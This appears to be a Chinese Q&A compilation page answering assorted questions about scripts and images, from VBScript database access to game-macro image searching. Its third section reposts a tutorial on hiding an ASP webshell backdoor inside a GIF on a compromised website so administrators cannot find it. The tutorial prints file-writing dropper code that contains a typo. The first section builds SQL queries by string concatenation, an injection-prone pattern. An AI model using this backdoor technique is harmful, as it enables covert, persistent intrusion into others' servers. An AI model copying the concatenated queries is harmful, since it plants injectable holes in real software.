① vb腳本怎麼在腳本中插入圖片
用vbscript是可以調用sql語句的,這時你需要用vbs的ADODB對象
例如:
Setsqlconn=Server.CreateObject("ADODB.Connection")
ConnectString="DRIVER=;SERVER="&Session("Server")&";DATABASE="&Session("base")&_
";uid="&Session("Uid")&";pwd="&Session("Pswd")
SqlConn.OpenConnectString
SqlString="SELECTCOUNT(VEND_CD)"+_
"FROMT_SAMP_MATE"+_
"WHEREVEND_CD='"&strVENDCD&"'"+_
"ANDRECD_DATE>='"&strRECDDATESTA&"'"+_
SetCHKRsIbe=SqlConn.Execute(SqlString)
*****************************************
首先,你說的網頁使用VB腳本應該是VBScript,而不是VB。另外也可以用VB而不是VBScript,但那時候就更復雜,需要用VB編寫IE的插件等形式了。
其次,網頁使用VB腳本又分成兩種情況,1.伺服器端運行,這就是通常所說的ASP技術,嵌入在ASP網頁文件中的<%%>標記之內。2.客戶端運行,這就使常用的網頁腳本技術,嵌入在HTML網頁文件中的<scriptlanguage="VBScript"type="text/VBScript"></script>標記之內。
從你的情況來看,你應該使用伺服器端腳本技術,即ASP技術。其中涉及很多問題,最好買本書看,要不在網上看看VBScript教程,這里三兩句說不清楚的。
② 按鍵精靈可以在一個腳本里多次使用尋找圖片和操作么
你想寫連個腳本和在一起的?
你可以這樣弄 把兩個腳本弄合並在一起
然後找到這個圖後按鍵盤 啟動另一個腳本的熱鍵 N
③ 圖片內加入腳本
現在從注入拿WEBSHELL看來成功率都比較高了。拿到SHELL後,安裝自己的腳本後門,常常被查殺。 腳本後門的發展史:
1。最開始就是直接放一個ASP文件上去。
2。把ASP文件加密才放上去。
3。把腳本插入到代碼中去。(我經常用這種) 不過一樣被查得出來,我前段時候手工檢測一個站的腳本安全。發現這個站被種了21個木馬。所以我就想到了,怎麼樣才能不被發現不能被查殺。 最後我研究了一下如果把腳本插入到圖片中。然後在ASP中調用圖片中的腳本程序應該就可以了。 測試的時候通過了。現在我把我的心德寫一下。讓大家來分析一下。共同進步和完善這種方法。 在研究過程中我看了GIF圖片的結構文檔方面的書。 GIF圖片都是以 00 3B 為結束的。換句話說00 3B 後面的不會顯示出來。所以我們在00 3B後面插入代碼就行了。當然代碼我們加密放到圖片中去效果更好。我寫了一個程序來這么做。 這里要說一下,在圖片中00 3B後面的是不會顯示出來的。 但其中的代碼已經運行了。圖片也會正常顯示出來。 測試:
在圖片後面加入:<%=now%>
然後在一個ASP文件中加入:<!--#include file="aaa.gif" --> 然後你們下載這個圖片,發現圖片最後面變成了時間。很正常因為圖片放到了ASP腳本中運行了其中的代碼。 換句話來說,如果寫的是一段生成文件的腳本。那麼我們提交特定的參數讓圖片中的代碼去生成文件。這樣就實現了我們的後門。 1:這種方法要做的工作就是在目標站點中找一張GIF圖片然後把代碼插入到圖片中,再上傳到站點中去。這樣作管理員很難找到木馬在哪裡。打死也想不到木馬在圖片中。 2:我們插入的代碼只有一行就是那個include file .....
找個文件大點的ASP文件給插進去就行了。 然後我們在本地POST數據提交給ASP引用圖片的URL這樣就完成了工作。 我的插入圖片的腳本: <% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% fdata = request("cyfddata") %>
<% if fdata<>"" then %>
<% syfdpath=server.mappath(Request.ServerVariables("SCRIPT_NAME"))&"\ok.asp"%>
<% Set objCountFile=objFSO.CreateTextFile(syfdapth,True) %>
<% objCountFile.Write fdata %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %> 這段代碼主要就是在當前目錄下生成一個ok.asp文件。
文件內容是由我們提交的數據.用request("cyfddata")來獲取的。 這段代碼加密後插入到圖片中去。下面我把我程序的代碼貼出來。 本地自己構建一個提交表單向ASP文件提交(加入圖片那個文件) 表單文本框輸入內容名稱是:cyfddata 後感:
我本人認為這種方法,管理員很難查到。這是我兩天前想到的作出來了,可能有些問題希望和大家一起討論,必競,為了追求技術就得研究技術。
共享知識,從而升華。
感覺去研究一些新東西,人活得更XS些。
④ 使用按鍵精靈我寫的腳本為什麼沒找到圖片還是會運行點擊,我寫腳本意思是先找到第一張圖片(找到為真),找到
1 if後面一概是if intx>=109 inty>=103 變數不對應下面就出現你的問題了
2 MoveTo intX,intY移動到if intx>=109 inty>=103 先判斷再動作
2 我不知道你是玩什麼游戲 圖片是點擊一次就消失的么 如果是可以了 如果不是你的腳本這樣寫只能找到第一個圖片
⑤ 如何把JS類腳本或CMD命令插入圖片中
電腦,按F8進入安全模式,再用殺毒軟體查殺.
360安全衛士,清除
如果還是清除不了,你可以在資源管理器的工具-文件夾選項-勾選顯示所有文件和文件夾
然後到相應路徑找到該文件
⑥ 如何將可執行文件(如:*.bat)隱藏在圖片文件中
直接打開圖片就執行bat目前實現不了,如果存在就是系統漏洞,微軟就會打補丁了。
你想打開圖片就執行bat,我只能在對方運行你程序的前提下實現,而且不排除會被殺軟攔截。看你要不要了……
LS的那位我只能呵呵了……
⑦ 需要一個js腳本,實現打開圖片功能
最好不要使用替換的方式
使用JS 點擊打開方式會比較好
imglist=document.getElementsByTagName("IMG")
for(var i=0;i<imglist.length;i++){
o=imglist[i]
o.onclick=window.open(this.src);
o.style.cursor="pointer";
}
/*
javascript:document.getElementsByTagName("IMG")[0].getAttribute("src")
*/
⑧ 在圖片中插入JS腳本上傳到網站上,會被執行嗎
如果服務端 沒做 上傳文件 的安全 處理 該文件 里的JS腳本會在用戶訪問該圖片文件時被執行, 這是經典的圖片木馬技術中的一種 而已!
⑨ 腳本能做好一個自動保存圖片嗎
這個看具體情況,反正有些可以,部分不太信,因為存在一些影響,